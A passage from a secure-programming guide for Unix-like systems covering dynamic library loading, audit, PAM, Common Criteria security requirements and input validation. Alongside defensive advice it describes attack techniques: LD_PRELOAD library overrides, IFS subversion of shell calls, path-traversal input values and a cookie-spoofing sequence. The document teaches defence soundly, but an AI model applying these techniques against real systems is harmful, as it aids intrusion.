both filesystem quotas and process resource limits have ``hard'' and ``soft''
limits but the terms mean slightly different things.

You can define storage (filesystem) quota limits on each mountpoint for the
number of blocks of storage and/or the number of unique files (inodes) that
can be used, and you can set such limits for a given user or a given group. A
``hard'' quota limit is a never-to-exceed limit, while a ``soft'' quota can
be temporarily exceeded. See quota(1), quotactl(2), and quotaon(8).

The rlimit mechanism supports a large number of process quotas, such as file
size, number of child processes, number of open files, and so on. There is a
``soft'' limit (also called the current limit) and a ``hard limit'' (also
called the upper limit). The soft limit cannot be exceeded at any time, but
through calls it can be raised up to the value of the hard limit. See
getrlimit(2), setrlimit(2), and getrusage(2), sysconf(3), and ulimit(1). Note
that there are several ways to set these limits, including the PAM module
pam_limits.
-----------------------------------------------------------------------------

3.7. Dynamically Linked Libraries

Practically all programs depend on libraries to execute. In most modern
Unix-like systems, including Linux, programs are by default compiled to use
dynamically linked libraries (DLLs). That way, you can update a library and
all the programs using that library will use the new (hopefully improved)
version if they can.

Dynamically linked libraries are typically placed in one a few special
directories. The usual directories include /lib, /usr/lib, /lib/security for
PAM modules, /usr/X11R6/lib for X-windows, and /usr/local/lib. You should use
these standard conventions in your programs, in particular, except during
debugging you shouldn't use value computed from the current directory as a
source for dynamically linked libraries (an attacker may be able to add their
own choice ``library'' values).

There are special conventions for naming libraries and having symbolic links
for them, with the result that you can update libraries and still support
programs that want to use old, non-backward-compatible versions of those
libraries. There are also ways to override specific libraries or even just
specific functions in a library when executing a particular program. This is
a real advantage of Unix-like systems over Windows-like systems; I believe
Unix-like systems have a much better system for handling library updates, one
reason that Unix and Linux systems are reputed to be more stable than
Windows-based systems.

On GNU glibc-based systems, including all Linux systems, the list of
directories automatically searched during program start-up is stored in the
file /etc/ld.so.conf. Many Red Hat-derived distributions don't normally
include /usr/local/lib in the file /etc/ld.so.conf. I consider this a bug,
and adding /usr/local/lib to /etc/ld.so.conf is a common ``fix'' required to
run many programs on Red Hat-derived systems. If you want to just override a
few functions in a library, but keep the rest of the library, you can enter
the names of overriding libraries (.o files) in /etc/ld.so.preload; these
``preloading'' libraries will take precedence over the standard set. This
preloading file is typically used for emergency patches; a distribution
usually won't include such a file when delivered. Searching all of these
directories at program start-up would be too time-consuming, so a caching
arrangement is actually used. The program ldconfig(8) by default reads in the
file /etc/ld.so.conf, sets up the appropriate symbolic links in the dynamic
link directories (so they'll follow the standard conventions), and then
writes a cache to /etc/ld.so.cache that's then used by other programs. So,
ldconfig has to be run whenever a DLL is added, when a DLL is removed, or
when the set of DLL directories changes; running ldconfig is often one of the
steps performed by package managers when installing a library. On start-up,
then, a program uses the dynamic loader to read the file /etc/ld.so.cache and
then load the libraries it needs.

Various environment variables can control this process, and in fact there are
environment variables that permit you to override this process (so, for
example, you can temporarily substitute a different library for this
particular execution). In Linux, the environment variable LD_LIBRARY_PATH is
a colon-separated set of directories where libraries are searched for first,
before the standard set of directories; this is useful when debugging a new
library or using a nonstandard library for special purposes, but be sure you
trust those who can control those directories. The variable LD_PRELOAD lists
object files with functions that override the standard set, just as /etc/
ld.so.preload does. The variable LD_DEBUG, displays debugging information; if
set to ``all'', voluminous information about the dynamic linking process is
displayed while it's occurring.

Permitting user control over dynamically linked libraries would be disastrous
for setuid/setgid programs if special measures weren't taken. Therefore, in
the GNU glibc implementation, if the program is setuid or setgid these
variables (and other similar variables) are ignored or greatly limited in
what they can do. The GNU glibc library determines if a program is setuid or
setgid by checking the program's credentials; if the UID and EUID differ, or
the GID and the EGID differ, the library presumes the program is setuid/
setgid (or descended from one) and therefore greatly limits its abilities to
control linking. If you load the GNU glibc libraries, you can see this; see
especially the files elf/rtld.c and sysdeps/generic/dl-sysdep.c. This means
that if you cause the UID and GID to equal the EUID and EGID, and then call a
program, these variables will have full effect. Other Unix-like systems
handle the situation differently but for the same reason: a setuid/setgid
program should not be unduly affected by the environment variables set. Note
that graphical user interface toolkits generally do permit user control over
dynamically linked libraries, because executables that directly invoke
graphical user inteface toolkits should never, ever, be setuid (or have other
special privileges) at all. For more about how to develop secure GUI
applications, see Section 7.4.4.

For Linux systems, you can get more information from my document, the Program
Library HOWTO.
-----------------------------------------------------------------------------

3.8. Audit

Different Unix-like systems handle auditing differently. In Linux, the most
common ``audit'' mechanism is syslogd(8), usually working in conjunction with
klogd(8). You might also want to look at wtmp(5), utmp(5), lastlog(8), and
acct(2). Some server programs (such as the Apache web server) also have their
own audit trail mechanisms. According to the FHS, audit logs should be stored
in /var/log or its subdirectories.
-----------------------------------------------------------------------------

3.9. PAM

Sun Solaris and nearly all Linux systems use the Pluggable Authentication
Modules (PAM) system for authentication. PAM permits run-time configuration
of authentication methods (e.g., use of passwords, smart cards, etc.). See
Section 11.6 for more information on using PAM.
-----------------------------------------------------------------------------

3.10. Specialized Security Extensions for Unix-like Systems

A vast amount of research and development has gone into extending Unix-like
systems to support security needs of various communities. For example,
several Unix-like systems have been extended to support the U.S. military's
desire for multilevel security. If you're developing software, you should try
to design your software so that it can work within these extensions.

FreeBSD has a new system call, [http://docs.freebsd.org/44doc/papers/jail/
jail.html] jail(2). The jail system call supports sub-partitioning an
environment into many virtual machines (in a sense, a ``super-chroot''); its
most popular use has been to provide virtual machine services for Internet
Service Provider environments. Inside a jail, all processes (even those owned
by root) have the the scope of their requests limited to the jail. When a
FreeBSD system is booted up after a fresh install, no processes will be in
jail. When a process is placed in a jail, it, and any descendants of that
process created will be in that jail. Once in a jail, access to the file
name-space is restricted in the style of chroot(2) (with typical chroot
escape routes blocked), the ability to bind network resources is limited to a
specific IP address, the ability to manipulate system resources and perform
privileged operations is sharply curtailed, and the ability to interact with
other processes is limited to only processes inside the same jail. Note that
each jail is bound to a single IP address; processes within the jail may not
make use of any other IP address for outgoing or incoming connections.

Some extensions available in Linux, such as POSIX capabilities and special
mount-time options, have already been discussed. Here are a few of these
efforts for Linux systems for creating restricted execution environments;
there are many different approaches. The U.S. National Security Agency (NSA)
has developed [http://www.nsa.gov/selinux] Security-Enhanced Linux (Flask),
which supports defining a security policy in a specialized language and then
enforces that policy. The [http://medusa.fornax.sk] Medusa DS9 extends Linux
by supporting, at the kernel level, a user-space authorization server. [http:
//www.lids.org] LIDS protects files and processes, allowing administrators to
``lock down'' their system. The ``Rule Set Based Access Control'' system,
[http://www.rsbac.de] RSBAC is based on the Generalized Framework for Access
Control (GFAC) by Abrams and LaPadula and provides a flexible system of
access control based on several kernel modules. [http://subterfugue.org]
Subterfugue is a framework for ``observing and playing with the reality of
software''; it can intercept system calls and change their parameters and/or
change their return values to implement sandboxes, tracers, and so on; it
runs under Linux 2.4 with no changes (it doesn't require any kernel
modifications). [http://www.cs.berkeley.edu/~daw/janus] Janus is a security
tool for sandboxing untrusted applications within a restricted execution
environment. Some have even used [http://user-mode-linux.sourceforge.net]
User-mode Linux, which implements ``Linux on Linux'', as a sandbox
implementation. Because there are so many different approaches to
implementing more sophisticated security models, Linus Torvalds has requested
that a generic approach be developed so different security policies can be
inserted; for more information about this, see [http://mail.wirex.com/mailman
/listinfo/linux-security-module] http://mail.wirex.com/mailman/listinfo/
linux-security-module.

There are many other extensions for security on various Unix-like systems,
but these are really outside the scope of this document.
-----------------------------------------------------------------------------

Chapter 4. Security Requirements

<A0>                                      You will know that your tent is
                                       secure; you will take stock of your
                                       property and find nothing missing.
<A0>                                                              Job 5:24 (NIV)

Before you can determine if a program is secure, you need to determine
exactly what its security requirements are. Thankfully, there's an
international standard for identifying and defining security requirements
that is useful for many such circumstances: the Common Criteria [CC 1999],
standardized as ISO/IEC 15408:1999. The CC is the culmination of decades of
work to identify information technology security requirements. There are
other schemes for defining security requirements and evaluating products to
see if products meet the requirements, such as NIST FIPS-140 for
cryptographic equipment, but these other schemes are generally focused on a
specialized area and won't be considered further here.

This chapter briefly describes the Common Criteria (CC) and how to use its
concepts to help you informally identify security requirements and talk with
others about security requirements using standard terminology. The language
of the CC is more precise, but it's also more formal and harder to
understand; hopefully the text in this section will help you "get the jist".

Note that, in some circumstances, software cannot be used unless it has
undergone a CC evaluation by an accredited laboratory. This includes certain
kinds of uses in the U.S. Department of Defense (as specified by NSTISSP
Number 11, which requires that before some products can be used they must be
evaluated or enter evaluation), and in the future such a requirement may also
include some kinds of uses for software in the U.S. federal government. This
section doesn't provide enough information if you plan to actually go through
a CC evaluation by an accredited laboratory. If you plan to go through a
formal evaluation, you need to read the real CC, examine various websites to
really understand the basics of the CC, and eventually contract a lab
accredited to do a CC evaluation.
-----------------------------------------------------------------------------

4.1. Common Criteria Introduction

First, some general information about the CC will help understand how to
apply its concepts. The CC's official name is "The Common Criteria for
Information Technology Security Evaluation", though it's normally just called
the Common Criteria. The CC document has three parts: the introduction (that
describes the CC overall), security functional requirements (that lists
various kinds of security functions that products might want to include), and
security assurance requirements (that lists various methods of assuring that
a product is secure). There is also a related document, the "Common
Evaluation Methodology" (CEM), that guides evaluators how to apply the CC
when doing formal evaluations (in particular, it amplifies what the CC means
in certain cases).

Although the CC is International Standard ISO/IEC 15408:1999, it is
outrageously expensive to order the CC from ISO. Hopefully someday ISO will
follow the lead of other standards organizations such as the IETF and the
W3C, which freely redistribute standards. Not surprisingly, IETF and W3C
standards are followed more often than many ISO standards, in part because
ISO's fees for standards simply make them inaccessible to most developers. (I
don't mind authors being paid for their work, but ISO doesn't fund most of
the standards development work - indeed, many of the developers of ISO
documents are volunteers - so ISO's indefensible fees only line their own
pockets and don't actually aid the authors or users at all.) Thankfully, the
CC developers anticipated this problem and have made sure that the CC's
technical content is freely available to all; you can download the CC's
technical content from [http://csrc.nist.gov/cc/ccv20/ccv2list.htm] http://
csrc.nist.gov/cc/ccv20/ccv2list.htm Even those doing formal evaluation
processes usually use these editions of the CC, and not the ISO versions;
there's simply no good reason to pay ISO for them.

Although it can be used in other ways, the CC is typically used to create two
kinds of documents, a ``Protection Profile'' (PP) or a ``Security Target''
(ST). A ``protection profile'' (PP) is a document created by group of users
(for example, a consumer group or large organization) that identifies the
desired security properties of a product. Basically, a PP is a list of user
security requirements, described in a very specific way defined by the CC. If
you're building a product similar to other existing products, it's quite
possible that there are one or more PPs that define what some users believe
are necessary for that kind of product (e.g., an operating system or
firewall). A ``security target'' (ST) is a document that identifies what a
product actually does, or a subset of it, that is security-relevant. An ST
doesn't need to meet the requirements of any particular PP, but an ST could
meet the requirements of one or more PPs.

Both PPs and STs can go through a formal evaluation. An evaluation of a PP
simply ensures that the PP meets various documentation rules and sanity
checks. An ST evaluation involves not just examining the ST document, but
more importantly it involves evaluating an actual system (called the ``target
of evaluation'', or TOE). The purpose of an ST evaluation is to ensure that,
to the level of the assurance requirements specified by the ST, the actual
product (the TOE) meets the ST's security functional requirements. Customers
can then compare evaluated STs to PPs describing what they want. Through this
comparison, consumers can determine if the products meet their requirements -
and if not, where the limitations are.

To create a PP or ST, you go through a process of identifying the security
environment, namely, your assumptions, threats, and relevant organizational
security policies (if any). From the security environment, you derive the
security objectives for the product or product type. Finally, the security
requirements are selected so that they meet the objectives. There are two
kinds of security requirements: functional requirements (what a product has
to be able to do), and assurance requirements (measures to inspire confidence
that the objectives have been met). Actually creating a PP or ST is often not
a simple straight line as outlined here, but the final result needs to show a
clear relationship so that no critical point is easily overlooked. Even if
you don't plan to write an ST or PP, the ideas in the CC can still be
helpful; the process of identifying the security environment, objectives, and
requirements is still helpful in identifying what's really important.

The vast majority of the CC's text is used to define standardized functional
requirements and assurance requirements. In essence, the majority of the CC
is a ``chinese menu'' of possible security requirements that someone might
want. PP authors pick from the various options to describe what they want,
and ST authors pick from the options to describe what they provide.

Since many people might have difficulty identifying a reasonable set of
assurance requirements, so pre-created sets of assurance requirements called
``evaluation assurance levels'' (EALs) have been defined, ranging from 1 to
7. EAL 2 is simply a standard shorthand for the set of assurance requirements
defined for EAL 2. Products can add additional assurance measures, for
example, they might choose EAL 2 plus some additional assurance measures (if
the combination isn't enough to achieve a higher EAL level, such a
combination would be called "EAL 2 plus"). There are mutual recognition
agreements signed between many of the world's nations that will accept an
evaluation done by an accredited laboratory in the other countries as long as
all of the assurance measures taken were at the EAL 4 level or less.

If you want to actually write an ST or PP, there's an open source software
program that can help you, called the ``CC Toolbox''. It can make sure that
dependencies between requirements are met, suggest common requirements, and
help you quickly develop a document, but it obviously can't do your thinking
for you. The specification of exactly what information must be in a PP or ST
are in CC part 1, annexes B and C respectively.

If you do decide to have your product (or PP) evaluated by an accredited
laboratory, be prepared to spend money, spend time, and work throughout the
process. In particular, evaluations require paying an accredited lab to do
the evaluation, and higher levels of assurance become rapidly more expensive.
Simply believing your product is secure isn't good enough; evaluators will
require evidence to justify any claims made. Thus, evaluations require
documentation, and usually the available documentation has to be improved or
developed to meet CC requirements (especially at the higher assurance
levels). Every claim has to be justified to some level of confidence, so the
more claims made, the stronger the claims, and the more complicated the
design, the more expensive an evaluation is. Obviously, when flaws are found,
they will usually need to be fixed. Note that a laboratory is paid to
evaluate a product and determine the truth. If the product doesn't meet its
claims, then you basically have two choices: fix the product, or change
(reduce) the claims.

It's important to discuss with customers what's desired before beginning a
formal ST evaluation; an ST that includes functional or assurance
requirements not truly needed by customers will be unnecessarily expensive to
evaluate, and an ST that omits necessary requirements may not be acceptable
to the customers (because that necessary piece won't have been evaluated).
PPs identify such requirements, but make sure that the PP accurately reflects
the customer's real requirements (perhaps the customer only wants a part of
the functionality or assurance in the PP, or has a different environment in
mind, or wants something else instead for the situations where your product
will be used). Note that an ST need not include every security feature in a
product; an ST only states what will be (or has been) evaluated. A product
that has a higher EAL rating is not necessarily more secure than a similar
product with a lower rating or no rating; the environment might be different,
the evaluation may have saved money and time by not evaluating the other
product at a higher level, or perhaps the evaluation missed something
important. Evaluations are not proofs; they simply impose a defined minimum
bar to gain confidence in the requirements or product.
-----------------------------------------------------------------------------

4.2. Security Environment and Objectives

The first step in defining a PP or ST is identify the ``security
environment''. This means that you have to consider the physical environment
(can attackers access the computer hardware?), the assets requiring
protection (files, databases, authorization credentials, and so on), and the
purpose of the TOE (what kind of product is it? what is the intended use?).

In developing a PP or ST, you'd end up with a statement of assumptions (who
is trusted? is the network or platform benign?), threats (that the system or
its environment must counter), and organizational security policies (that the
system or its environment must meet). A threat is characterized in terms of a
threat agent (who might perform the attack?), a presumed attack method, any
vulnerabilities that are the basis for the attack, and what asset is under
attack.

You'd then define a set of security objectives for the system and
environment, and show that those objectives counter the threats and satisfy
the policies. Even if you aren't creating a PP or ST, thinking about your
assumptions, threats, and possible policies can help you avoid foolish
decisions. For example, if the computer network you're using can be sniffed
(e.g., the Internet), then unencrypted passwords are a foolish idea in most
circumstances.

For the CC, you'd then identify the functional and assurance requirements
that would be met by the TOE, and which ones would be met by the environment,
to meet those security objectives. These requirements would be selected from
the ``chinese menu'' of the CC's possible requirements, and the next sections
will briefly describe the major classes of requirements. In the CC,
requirements are grouped into classes, which are subdivided into families,
which are further subdivided into components; the details of all this are in
the CC itself if you need to know about this. A good diagram showing how this
works is in the CC part 1, figure 4.5, which I cannot reproduce here.

Again, if you're not intending for your product to undergo a CC evaluation,
it's still good to briefly determine this kind of information and informally
write include that information in your documentation (e.g., the man page or
whatever your documentation is).
-----------------------------------------------------------------------------

4.3. Security Functionality Requirements

This section briefly describes the CC security functionality requirements (by
CC class), primarily to give you an idea of the kinds of security
requirements you might want in your software. If you want more detail about
the CC's requirements, see CC part 2. Here are the major classes of CC
security requirements, along with the 3-letter CC abbreviation for that
class:

<A0><A0>*<2A>Security Audit (FAU). Perhaps you'll need to recognize, record, store,
    and analyze security-relevant activities. You'll need to identify what
    you want to make auditable, since often you can't leave all possible
    auditing capabilities enabled. Also, consider what to do when there's no
    room left for auditing - if you stop the system, an attacker may
    intentionally do things to be logged and thus stop the system.

<A0><A0>*<2A>Communication/Non-repudiation (FCO). This class is poorly named in the
    CC; officially it's called communication, but the real meaning is
    non-repudiation. Is it important that an originator cannot deny having
    sent a message, or that a recipient cannot deny having received it? There
    are limits to how well technology itself can support non-repudiation
    (e.g., a user might be able to give their private key away ahead of time
    if they wanted to be able to repudiate something later), but nevertheless
    for some applications supporting non-repudiation capabilities is very
    useful.

<A0><A0>*<2A>Cryptographic Support (FCS). If you're using cryptography, what
    operations use cryptography, what algorithms and key sizes are you using,
    and how are you managing their keys (including distribution and
    destruction)?

<A0><A0>*<2A>User Data Protection (FDP). This class specifies requirement for
    protecting user data, and is a big class in the CC with many families
    inside it. The basic idea is that you should specify a policy for data
    (access control or information flow rules), develop various means to
    implement the policy, possibly support off-line storage, import, and
    export, and provide integrity when transferring user data between TOEs.
    One often-forgotten issue is residual information protection - is it
    acceptable if an attacker can later recover ``deleted'' data?

<A0><A0>*<2A>Identification and authentication (FIA). Generally you don't just want a
    user to report who they are (identification) - you need to verify their
    identity, a process called authentication. Passwords are the most common
    mechanism for authentication. It's often useful to limit the number of
    authentication attempts (if you can) and limit the feedback during
    authentication (e.g., displaying asterisks instead of the actual
    password). Certainly, limit what a user can do before authenticating; in
    many cases, don't let the user do anything without authenticating. There
    may be many issues controlling when a session can start, but in the CC
    world this is handled by the "TOE access" (FTA) class described below
    instead.

<A0><A0>*<2A>Security Management (FMT). Many systems will require some sort of
    management (e.g., to control who can do what), generally by those who are
    given a more trusted role (e.g., administrator). Be sure you think
    through what those special operations are, and ensure that only those
    with the trusted roles can invoke them. You want to limit trust; ideally,
    even more trusted roles should be limited in what they can do.

<A0><A0>*<2A>Privacy (FPR). Do you need to support anonymity, pseudonymity,
    unlinkability, or unobservability? If so, are there conditions where you
    want or don't want these (e.g., should an administrator be able to
    determine the real identity of someone hiding behind a pseudonym?). Note
    that these can seriously conflict with non-repudiation, if you want those
    too. If you're worried about sophisticated threats, these functions can
    be hard to provide.

<A0><A0>*<2A>Protection of the TOE Security Functions/Self-protection (FPT). Clearly,
    if the TOE can be subverted, any security functions it provides aren't
    worthwhile, and in many cases a TOE has to provide at least some
    self-protection. Perhaps you should "test the underlying abstract
    machine" - i.e., test that the underlying components meet your
    assumptions, or have the product run self-tests (say during start-up,
    periodically, or on request). You should probably "fail secure", at least
    under certain conditions; determine what those conditions are. Consider
    phyical protection of the TOE. You may want some sort of secure recovery
    function after a failure. It's often useful to have replay detection
    (detect when an attacker is trying to replay older actions) and counter
    it. Usually a TOE must make sure that any access checks are always
    invoked and actually succeed before performing a restricted action.

<A0><A0>*<2A>Resource Utilization (FRU). Perhaps you need to provide fault tolerance,
    a priority of service scheme, or support resource allocation (such as a
    quota system).

<A0><A0>*<2A>TOE Access (FTA). There may be many issues controlling sessions. Perhaps
    there should be a limit on the number of concurrent sessions (if you're
    running a web service, would it make sense for the same user to be logged
    in simultaneously, or from two different machines?). Perhaps you should
    lock or terminate a session automatically (e.g., after a timeout), or let
    users initiate a session lock. You might want to include a standard
    warning banner. One surprisingly useful piece of information is
    displaying, on login, information about the last session (e.g., the date/
    time and location of the last login) and the date/time of the last
    unsuccessful attempt - this gives users information that can help them
    detect interlopers. Perhaps sessions can only be established based on
    other criteria (e.g., perhaps you can only use the program during
    business hours).

<A0><A0>*<2A>Trusted path/channels (FTP). A common trick used by attackers is to make
    the screen appear to be something it isn't, e.g., run an ordinary program
    that looks like a login screen or a forged web site. Thus, perhaps there
    needs to be a "trusted path" - a way that users can ensure that they are
    talking to the "real" program.


-----------------------------------------------------------------------------

4.4. Security Assurance Measure Requirements

As noted above, the CC has a set of possible assurance requirements that can
be selected, and several predefined sets of assurance requirements (EAL
levels 1 through 7). Again, if you're actually going to go through a CC
evaluation, you should examine the CC documents; I'll skip describing the
measures involving reviewing official CC documents (evaluating PPs and STs).
Here are some assurance measures that can increase the confidence others have
in your software:

<A0><A0>*<2A>Configuration management (ACM). At least, have unique a version
    identifier for each TOE release, so that users will know what they have.
    You gain more assurance if you have good automated tools to control your
    software, and have separate version identifiers for each piece (typical
    CM tools like CVS can do this, although CVS doesn't record changes as
    atomic changes which is a weakness of it). The more that's under
    configuration management, the better; don't just control your code, but
    also control documentation, track all problem reports (especially
    security-related ones), and all development tools.

<A0><A0>*<2A>Delivery and operation (ADO). Your delivery mechanism should ideally let
    users detect unauthorized modifications to prevent someone else
    masquerading as the developer, and even better, prevent modification in
    the first place. You should provide documentation on how to securely
    install, generate, and start-up the TOE, possibly generating a log
    describing how the TOE was generated.

<A0><A0>*<2A>Development (ADV). These CC requirements deal with documentation
    describing the TOE implementation, and that they need to be consistent
    between each other (e.g., the information in the ST, functional
    specification, high-level design, low-level design, and code, as well as
    any models of the security policy).

<A0><A0>*<2A>Guidance documents (AGD). Users and administrators of your product will
    probably need some sort of guidance to help them use it correctly. It
    doesn't need to be on paper; on-line help and "wizards" can help too. The
    guidance should include warnings about actions that may be a problem in a
    secure environemnt, and describe how to use the system securely.

<A0><A0>*<2A>Life-cycle support (ALC). This includes development security (securing
    the systems being used for development, including physical security), a
    flaw remediation process (to track and correct all security flaws), and
    selecting development tools wisely.

<A0><A0>*<2A>Tests (ATE). Simply testing can help, but remember that you need to test
    the security functions and not just general functions. You should check
    if something is set to permit, it's permitted, and if it's forbidden, it
    is no longer permitted. Of course, there may be clever ways to subvert
    this, which is what vulnerability assessment is all about (described
    next).

<A0><A0>*<2A>Vulnerability Assessment (AVA). Doing a vulnerability analysis is useful,
    where someone pretends to be an attacker and tries to find
    vulnerabilities in the product using the available information, including
    documentation (look for "don't do X" statements and see if an attacker
    could exploit them) and publicly known past vulnerabilities of this or
    similar products. This book describes various ways of countering known
    vulnerabilities of previous products to problems such as replay attacks
    (where known-good information is stored and retransmitted), buffer
    overflow attacks, race conditions, and other issues that the rest of this
    book describes. The user and administrator guidance documents should be
    examined to ensure that misleading, unreasonable, or conflicting guidance
    is removed, and that secrity procedures for all modes of operation have
    been addressed. Specialized systems may need to worry about covert
    channels; read the CC if you wish to learn more about covert channels.

<A0><A0>*<2A>Maintenance of assurance (AMA). If you're not going through a CC
    evaluation, you don't need a formal AMA process, but all software
    undergoes change. What is your process to give all your users strong
    confidence that future changes to your software will not create new
    vulnerabilities? For example, you could establish a process where
    multiple people review any proposed changes.


-----------------------------------------------------------------------------
Chapter 5. Validate All Input

<A0>                                      Wisdom will save you from the ways of
                                       wicked men, from men whose words are
                                       perverse...
<A0>                                                         Proverbs 2:12 (NIV)

Some inputs are from untrustable users, so those inputs must be validated
(filtered) before being used. You should determine what is legal and reject
anything that does not match that definition. Do not do the reverse (identify
what is illegal and write code to reject those cases), because you are likely
to forget to handle an important case of illegal input.

There is a good reason for identifying ``illegal'' values, though, and that's
as a set of tests (usually just executed in your head) to be sure that your
validation code is thorough. When I set up an input filter, I mentally attack
the filter to see if there are illegal values that could get through.
Depending on the input, here are a few examples of common ``illegal'' values
that your input filters may need to prevent: the empty string, ".", "..", "..
/", anything starting with "/" or ".", anything with "/" or "&" inside it,
any control characters (especially NIL and newline), and/or any characters
with the ``high bit'' set (especially values decimal 254 and 255, and
character 133 is the Unicode Next-of-line character used by OS/390). Again,
your code should not be checking for ``bad'' values; you should do this check
mentally to be sure that your pattern ruthlessly limits input values to legal
values. If your pattern isn't sufficiently narrow, you need to carefully
re-examine the pattern to see if there are other problems.

Limit the maximum character length (and minimum length if appropriate), and
be sure to not lose control when such lengths are exceeded (see Chapter 6 for
more about buffer overflows).

Here are a few common data types, and things you should validate before using
them from an untrusted user:

<A0><A0>*<2A>For strings, identify the legal characters or legal patterns (e.g., as a
    regular expression) and reject anything not matching that form. There are
    special problems when strings contain control characters (especially
    linefeed or NIL) or metacharacters (especially shell metacharacters); it
    is often best to ``escape'' such metacharacters immediately when the
    input is received so that such characters are not accidentally sent. CERT
    goes further and recommends escaping all characters that aren't in a list
    of characters not needing escaping [CERT 1998, CMU 1998]. See Section 8.3
    for more information on metacharacters. Note that [http://www.w3.org/TR/
    2001/NOTE-newline-20010314] line ending encodings vary on different
    computers: Unix-based systems use character 0x0a (linefeed), CP/M and DOS
    based systems (including Windows) use 0x0d 0x0a (carriage-return
    linefeed, and some programs incorrectly reverse the order), the Apple
    MacOS uses 0x0d (carriage return), and IBM OS/390 uses 0x85 (0x85) (next
    line, sometimes called newline).

<A0><A0>*<2A>Limit all numbers to the minimum (often zero) and maximum allowed values.

<A0><A0>*<2A>A full email address checker is actually quite complicated, because there
    are legacy formats that greatly complicate validation if you need to
    support all of them; see mailaddr(7) and IETF RFC 822 [RFC 822] for more
    information if such checking is necessary. Friedl [1997] developed a
    regular expression to check if an email address is valid (according to
    the specification); his ``short'' regular expression is 4,724 characters,
    and his ``optimized'' expression (in appendix B) is 6,598 characters
    long. And even that regular expression isn't perfect; it can't recognize
    local email addresses, and it can't handle nested parentheses in comments
    (as the specification permits). Often you can simplify and only permit
    the ``common'' Internet address formats.

<A0><A0>*<2A>Filenames should be checked; see Section 5.4 for more information on
    filenames.

<A0><A0>*<2A>URIs (including URLs) should be checked for validity. If you are directly
    acting on a URI (i.e., you're implementing a web server or
    web-server-like program and the URL is a request for your data), make
    sure the URI is valid, and be especially careful of URIs that try to
    ``escape'' the document root (the area of the filesystem that the server
    is responding to). The most common ways to escape the document root are
    via ``..'' or a symbolic link, so most servers check any ``..''
    directories themselves and ignore symbolic links unless specially
    directed. Also remember to decode any encoding first (via URL encoding or
    UTF-8 encoding), or an encoded ``..'' could slip through. URIs aren't
    supposed to even include UTF-8 encoding, so the safest thing is to reject
    any URIs that include characters with high bits set.

    If you are implementing a system that uses the URI/URL as data, you're
    not home-free at all; you need to ensure that malicious users can't
    insert URIs that will harm other users. See Section 5.11.4 for more
    information about this.

<A0><A0>*<2A>When accepting cookie values, make sure to check the the domain value for
    any cookie you're using is the expected one. Otherwise, a (possibly
    cracked) related site might be able to insert spoofed cookies. Here's an
    example from IETF RFC 2965 of how failing to do this check could cause a
    problem:

    <20><>+<2B>User agent makes request to victim.cracker.edu, gets back cookie
        session_id="1234" and sets the default domain victim.cracker.edu.

    <20><>+<2B>User agent makes request to spoof.cracker.edu, gets back cookie
        session-id="1111", with Domain=".cracker.edu".

    <20><>+<2B>User agent makes request to victim.cracker.edu again, and passes:
                 Cookie: $Version="1"; session_id="1234",
                         $Version="1"; session_id="1111"; $Domain=".cracker.edu"
        The server at victim.cracker.edu should detect that the second cookie
        was not one it originated by noticing that the Domain attribute is
        not for itself and ignore it.


Unless you account for them, the legal character patterns must not include
characters or character sequences that have special meaning to either the
program internals or the eventual output:

<A0><A0>*<2A>A character sequence may have special meaning to the program's internal
    storage format. For example, if you store data (internally or externally)
    in delimited strings, make sure that the delimiters are not permitted
    data values. A number of programs store data in comma (,) or colon (:)
    delimited text files; inserting the delimiters in the input can be a
    problem unless the program accounts for it (i.e., by preventing it or
    encoding it in some way). Other characters often causing these problems
    include single and double quotes (used for surrounding strings) and the
    less-than sign "<" (used in SGML, XML, and HTML to indicate a tag's
    beginning; this is important if you store data in these formats). Most
    data formats have an escape sequence to handle these cases; use it, or
    filter such data on input.

<A0><A0>*<2A>A character sequence may have special meaning if sent back out to a user.
    A common example of this is permitting HTML tags in data input that will
    later be posted to other readers (e.g., in a guestbook or ``reader
    comment'' area). However, the problem is much more general. See Section
    7.15 for a general discussion on the topic, and see Section 5.11 for a
    specific discussion about filtering HTML.


These tests should usually be centralized in one place so that the validity
tests can be easily examined for correctness later.

Make sure that your validity test is actually correct; this is particularly a
problem when checking input that will be used by another program (such as a
filename, email address, or URL). Often these tests have subtle errors,
producing the so-called ``deputy problem'' (where the checking program makes
different assumptions than the program that actually uses the data). If
there's a relevant standard, look at it, but also search to see if the
program has extensions that you need to know about.

While parsing user input, it's a good idea to temporarily drop all
privileges, or even create separate processes (with the parser having
permanently dropped privileges, and the other process performing security
checks against the parser requests). This is especially true if the parsing
task is complex (e.g., if you use a lex-like or yacc-like tool), or if the
programming language doesn't protect against buffer overflows (e.g., C and
C++). See Section 7.4 for more information on minimizing privileges.

When using data for security decisions (e.g., ``let this user in''), be sure
to use trustworthy channels. For example, on a public Internet, don't just
use the machine IP address or port number as the sole way to authenticate
users, because in most environments this information can be set by the
(potentially malicious) user. See Section 7.11 for more information.

The following subsections discuss different kinds of inputs to a program;
note that input includes process state such as environment variables, umask
values, and so on. Not all inputs are under the control of an untrusted user,
so you need only worry about those inputs that are.
-----------------------------------------------------------------------------

5.1. Command line

Many programs take input from the command line. A setuid/setgid program's
command line data is provided by an untrusted user, so a setuid/setgid
program must defend itself from potentially hostile command line values.
Attackers can send just about any kind of data through a command line
(through calls such as the execve(3) call). Therefore, setuid/setgid programs
must completely validate the command line inputs and must not trust the name
of the program reported by command line argument zero (an attacker can set it
to any value including NULL).
-----------------------------------------------------------------------------

5.2. Environment Variables

By default, environment variables are inherited from a process' parent.
However, when a program executes another program, the calling program can set
the environment variables to arbitrary values. This is dangerous to setuid/
setgid programs, because their invoker can completely control the environment
variables they're given. Since they are usually inherited, this also applies
transitively; a secure program might call some other program and, without
special measures, would pass potentially dangerous environment variables
values on to the program it calls. The following subsections discuss
environment variables and what to do with them.
-----------------------------------------------------------------------------

5.2.1. Some Environment Variables are Dangerous

Some environment variables are dangerous because many libraries and programs
are controlled by environment variables in ways that are obscure, subtle, or
undocumented. For example, the IFS variable is used by the sh and bash shell
to determine which characters separate command line arguments. Since the
shell is invoked by several low-level calls (like system(3) and popen(3) in
C, or the back-tick operator in Perl), setting IFS to unusual values can
subvert apparently-safe calls. This behavior is documented in bash and sh,
but it's obscure; many long-time users only know about IFS because of its use
in breaking security, not because it's actually used very often for its
intended purpose. What is worse is that not all environment variables are
documented, and even if they are, those other programs may change and add
dangerous environment variables. Thus, the only real solution (described
below) is to select the ones you need and throw away the rest.
-----------------------------------------------------------------------------

5.2.2. Environment Variable Storage Format is Dangerous

Normally, programs should use the standard access routines to access
environment variables. For example, in C, you should get values using getenv
(3), set them using the POSIX standard routine putenv(3) or the BSD extension
